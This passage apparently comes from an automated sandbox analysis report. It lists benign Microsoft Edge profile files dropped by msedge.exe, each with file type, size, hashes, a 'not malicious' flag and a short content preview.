Preview:	..-.............Q...........S.3.-.......m.....-.............Q...........S.3.-.......m...........M...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	333752
Entropy (8bit):	0.9331229149844433
Encrypted:	false
SSDEEP:	384:CUMdf6Q8pytsBpbtt5pUthbpotJcpttuTHpXt0fp5toN1Apgptpv8HyIyZ1QyOyj:TS0gSK8Dcoesbd
MD5:	EC335EDC3269AE4C968069FAD4BB3015
SHA1:	9186E70F008CC56D33705A2EF974AF5B9CFADAF0
SHA-256:	DE283815A5A6E248DE9059E96673618AD0BFF673F5B2C145906AAA43A07FAA8C
SHA-512:	650D4A5E480E1A871986D32C65B4F885E241B482EBEBD5E235D63CE335F42AEF6C202B84FCA1A07DDE1D73D44C402BD425D95B27EE0302F1D05ECC1D2B68A161
Malicious:	false
Preview:	7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	419
Entropy (8bit):	3.6944868230940338
Encrypted:	false
SSDEEP:	6:/XntM+dl3sedhOmOuuuuuuuuuuuuolonsedhOu:llc8BOuuuuuuuuuuuuKos8/
MD5:	7F4A0B9BE1261A3C8E452A8EDF5B103B
SHA1:	A22101340FF5D87C2D2AAB467C973B202FF76195
SHA-256:	1A146F65578B7E92413A8A5DFE07CC4072D191D6CCEDEA6EC63504108070842D
SHA-512:	7F76EACD8DD0B4A57A2D35562F2922215F080673CE24BD47CC03416451621084C017C23DA0AAB70630FF0FEF3D19BD8F3BDC71CA65C14ED4B0BDB221B0D8CEB9
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................X*0................39_config..........6.....n ....1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.232399560352013
Encrypted:	false
SSDEEP:	6:Ht/VOq2PcNwi23oH+TcwtfrK+IFUt8YtvZmw+Ytr8FkwOcNwi23oH+TcwtfrUeLJ:N/AvLZYeb23FUt8Ev/+EAF54ZYeb3J
MD5:	2D66BAE403899A52B5DD24AAA513F8F4
SHA1:	87C9E602656994FED07854458AAB56C10D25544A
SHA-256:	9FBE5F96EF0D9ED44F098E67C7C9EA4CFAD5F747ADF9917713BF9B7FEF86B470
SHA-512:	46F28CFE57249535A2B2B735CA6C37B7B63D4EFA910F1BFAD5BEE2652C2F9B431D8BDD5EF31C21BAC417E08B11F26B9FD68081B2E1443408600C3832CFFA9399
Malicious:	false
Preview:	2024/11/08-20:47:24.743 1ba0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/08-20:47:24.756 1ba0 Recovering log #3.2024/11/08-20:47:24.757 1ba0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.232399560352013
Encrypted:	false
SSDEEP:	6:Ht/VOq2PcNwi23oH+TcwtfrK+IFUt8YtvZmw+Ytr8FkwOcNwi23oH+TcwtfrUeLJ:N/AvLZYeb23FUt8Ev/+EAF54ZYeb3J
MD5:	2D66BAE403899A52B5DD24AAA513F8F4
SHA1:	87C9E602656994FED07854458AAB56C10D25544A
SHA-256:	9FBE5F96EF0D9ED44F098E67C7C9EA4CFAD5F747ADF9917713BF9B7FEF86B470
SHA-512:	46F28CFE57249535A2B2B735CA6C37B7B63D4EFA910F1BFAD5BEE2652C2F9B431D8BDD5EF31C21BAC417E08B11F26B9FD68081B2E1443408600C3832CFFA9399
Malicious:	false
Preview:	2024/11/08-20:47:24.743 1ba0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/08-20:47:24.756 1ba0 Recovering log #3.2024/11/08-20:47:24.757 1ba0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	782
Entropy (8bit):	4.049291162962452
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
MD5:	FDF465758A7489458B387EB41C7D42B0
SHA1:	9509283CF1BD7397790091C5A7580CBA353A1143
SHA-256:	C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
SHA-512:	9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.191686435087633
Encrypted:	false
SSDEEP:	6:HtlUzMq2PcNwi23oH+TcwtfrzAdIFUt8YtlUz9Zmw+YtlURYTkwOcNwi23oH+Tc/:NVvLZYeb9FUt8Eg/+E+y54ZYeb2J
MD5:	A1ED33640BB8FF8CF9360E780630003F
SHA1:	13986CF3A0BF35F95B1D2C20C0053B078C8A3B33
SHA-256:	5AD1A920CBC7DF388BE070B4C0B05491300BB8A9D47E1544519621F92AD4AE77
SHA-512:	2F310DBEC7BF93D1862B6B0AEAA5E6EDA08EC1774D1132D9E80B99D928A4D7C5272519DA65749B045074BC0689E825BB455EF7914F823050C243B0F7012752AA
Malicious:	false
Preview:	2024/11/08-20:47:24.413 1264 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/08-20:47:24.413 1264 Recovering log #3.2024/11/08-20:47:24.414 1264 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.191686435087633
Encrypted:	false
SSDEEP:	6:HtlUzMq2PcNwi23oH+TcwtfrzAdIFUt8YtlUz9Zmw+YtlURYTkwOcNwi23oH+Tc/:NVvLZYeb9FUt8Eg/+E+y54ZYeb2J
MD5:	A1ED33640BB8FF8CF9360E780630003F
SHA1:	13986CF3A0BF35F95B1D2C20C0053B078C8A3B33
SHA-256:	5AD1A920CBC7DF388BE070B4C0B05491300BB8A9D47E1544519621F92AD4AE77
SHA-512:	2F310DBEC7BF93D1862B6B0AEAA5E6EDA08EC1774D1132D9E80B99D928A4D7C5272519DA65749B045074BC0689E825BB455EF7914F823050C243B0F7012752AA
Malicious:	false
Preview:	2024/11/08-20:47:24.413 1264 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/08-20:47:24.413 1264 Recovering log #3.2024/11/08-20:47:24.414 1264 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF22e78.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF22f05.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF230ca.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2577c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF280bf.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3417f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3688f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
